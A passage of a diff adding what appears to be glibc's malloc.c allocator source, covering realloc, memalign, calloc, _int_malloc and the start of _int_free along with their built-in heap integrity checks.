+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
